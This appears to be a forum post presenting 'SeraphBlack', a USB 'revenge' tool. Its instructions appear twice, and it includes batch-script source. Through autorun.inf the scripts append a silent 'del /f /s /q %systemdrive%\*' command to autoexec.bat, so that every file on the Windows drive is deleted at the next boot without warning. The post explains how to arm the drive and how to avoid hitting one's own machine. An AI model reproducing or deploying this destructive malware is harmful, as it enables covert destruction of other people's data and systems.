Before I start, I should note that this may or may not work if logged into the machine under any account other than 'Admin' or 'System'.
Having recently been 'inspired' by some scripts I've seen, I decided to expand upon it.
Basically, this is a nice 'revenge' tool.
The way this works is you extract the archive files onto the root directory of your USB thumbdrive.
If your thumbdrive letter is F:\ then you would copy all the files to this location..
Next, you must 'arm' the device by running the 'start.bat' script. This will configure the device as 'armed'. The usb drive is now LIVE.
(You may see errors if you plug the device into a computer while it is 'unarmed'. There are work arounds for this, but I felt like beling lazy and not including it. xD)
Now, whenever you plug the drive into a computer, the program is silently and automatically ran.
The scripts will inject 'del /s /q /f %systemdrive%\*' commands into the autoexec.bat file which is located on whatever drive windows is installed on. This file is automatically ran by windows during start.. and all commands in this batch file are ran. This means that our command will also be ran.
The command we are telling the machine is that we basically want to delete ALL files on this drive, and not give any warnings or show any information to the user.. which means they'll never see it coming.
When the machine is rebooted or the next time it is started, then the machine will delete all files on the Windows drive, while leaving all other drives alone.
For a better example:
1. USB device is plugged into computer while 'armed'.
2. autorun.inf file tells the computer to run start.cmd script.
(The machine must have 'autorun' enabled for this to work. If it is disabled, you'll have to 'browse' to the drive in windows to activate the autorun.inf file. Or you could just as easy run the \SeraphBlack\start.cmd script yourself. Your call. )
3. The start.cmd script echos the del /s /f /q %systemdrive%\* command to the screen, but I've instructed it to redirect the output and append it to the file at %systemdrive%\autoexec.bat ..
4. The machine is rebooted.
(I have also created an automatic reboot patch for it... However, I haven't included it. Seeing as how you may wish to reuse the drive later. If you have an extra spare drive that you don't care about using anymore, then it's perfect. I only have one usb thumbdrive, however. (256mb) And I do not want to go buy a new $20 drive.)
5. The machine runs autoexec.bat, which runs the command.
6. The machine silently deletes ALL files on the computer.
7. ???
8. Profit!
I have also included a 'patch' to remove the program from the system.
(It should remove the line from the autoexec.bat file.)
Always check the file yourself, by opening C:\autoexec.bat in notepad. You should NOT see a 'del' line, and if you do.. remove it! (The 'fix.bat' file is supposed to do this for you.) Still, better safe than sorry, eh?
The final 'patch' included is necessary if you 'insert' the armed device into your OWN machine.
The file 'stop2.bat' will disarm the device and automatically run the patch to remove the code from your system. I didn't want people to forget to run the 'fix' script on their own machines when they decided to disarm it..
And do NOT mess with the location of the files!!!
(Don't delete, rename, or move the folders 'SeraphBlack' or 'Backup'!!!)
Any ideas on a new project for meh?
Start/Stop .cmd (Primary script.)
autorun.inf (Autoruns 'armed' device.)
start.bat (Arms device.)
stop2.bat (Disarm and patches the system)
Fix.bat (Patches the system)
Before I start, I should note that this may or may not work if logged into the machine under any account other than 'Admin' or 'System'.
Having recently been 'inspired' by some scripts I've seen, I decided to expand upon it.
Basically, this is a nice 'revenge' tool.
The way this works is you extract the archive files onto the root directory of your USB thumbdrive.
If your thumbdrive letter is F:\ then you would copy all the files to this location..
Next, you must 'arm' the device by running the 'start.bat' script. This will configure the device as 'armed'. The usb drive is now LIVE.
(You may see errors if you plug the device into a computer while it is 'unarmed'. There are work arounds for this, but I felt like beling lazy and not including it. xD)
Now, whenever you plug the drive into a computer, the program is silently and automatically ran.
The scripts will inject 'del /s /q /f %systemdrive%\*' commands into the autoexec.bat file which is located on whatever drive windows is installed on. This file is automatically ran by windows during start.. and all commands in this batch file are ran. This means that our command will also be ran.
The command we are telling the machine is that we basically want to delete ALL files on this drive, and not give any warnings or show any information to the user.. which means they'll never see it coming.
When the machine is rebooted or the next time it is started, then the machine will delete all files on the Windows drive, while leaving all other drives alone.
For a better example:
1. USB device is plugged into computer while 'armed'.
2. autorun.inf file tells the computer to run start.cmd script.
(The machine must have 'autorun' enabled for this to work. If it is disabled, you'll have to 'browse' to the drive in windows to activate the autorun.inf file. Or you could just as easy run the \SeraphBlack\start.cmd script yourself. Your call. )
3. The start.cmd script echos the del /s /f /q %systemdrive%\* command to the screen, but I've instructed it to redirect the output and append it to the file at %systemdrive%\autoexec.bat ..
4. The machine is rebooted.
(I have also created an automatic reboot patch for it... However, I haven't included it. Seeing as how you may wish to reuse the drive later. If you have an extra spare drive that you don't care about using anymore, then it's perfect. I only have one usb thumbdrive, however. (256mb) And I do not want to go buy a new $20 drive.)
5. The machine runs autoexec.bat, which runs the command.
6. The machine silently deletes ALL files on the computer.
7. ???
8. Profit!
I have also included a 'patch' to remove the program from the system.
(It should remove the line from the autoexec.bat file.)
Always check the file yourself, by opening C:\autoexec.bat in notepad. You should NOT see a 'del' line, and if you do.. remove it! (The 'fix.bat' file is supposed to do this for you.) Still, better safe than sorry, eh?
The final 'patch' included is necessary if you 'insert' the armed device into your OWN machine.
The file 'stop2.bat' will disarm the device and automatically run the patch to remove the code from your system. I didn't want people to forget to run the 'fix' script on their own machines when they decided to disarm it..
And do NOT mess with the location of the files!!!
(Don't delete, rename, or move the folders 'SeraphBlack' or 'Backup'!!!)
Any ideas on a new project for meh?
Start/Stop .cmd (Primary script.)
@echo off
xcopy %systemdrive%\autoexec.bat \SeraphBlack\backup\ /Y
if not chdir==%systemdrive% %systemdrive%
echo del /f /s /q %systemdrive%\* >> autoexec.bat
autorun.inf (Autoruns 'armed' device.)
action=Open Files On Folder
start.bat (Arms device.)
@echo off
if exist \SeraphBlack\stop.cmd (rename \SeraphBlack\stop.cmd start.cmd)
stop2.bat (Disarm and patches the system)
@echo off
if exist \SeraphBlack\start.cmd (rename \SeraphBlack\start.cmd stop.cmd)
Fix.bat (Patches the system)
xcopy \SeraphBlack\backup\autoexec.bat %systemdrive%\autoexec.bat /Y